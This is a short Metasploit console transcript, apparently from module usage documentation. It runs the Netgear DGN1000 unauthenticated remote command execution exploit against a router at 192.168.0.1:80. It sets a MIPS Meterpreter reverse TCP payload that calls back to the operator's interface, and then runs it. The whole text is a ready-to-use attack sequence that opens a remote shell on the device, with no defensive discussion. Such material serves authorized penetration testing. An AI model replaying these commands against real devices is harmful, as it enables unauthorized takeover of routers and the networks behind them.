msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_execmsf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1 RHOST => 192.168.0.1 msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80 RPORT => 80 msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0 LHOST = eth0 msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp msf exploit(netgear_dgn1000_setup_unauth_exec) > run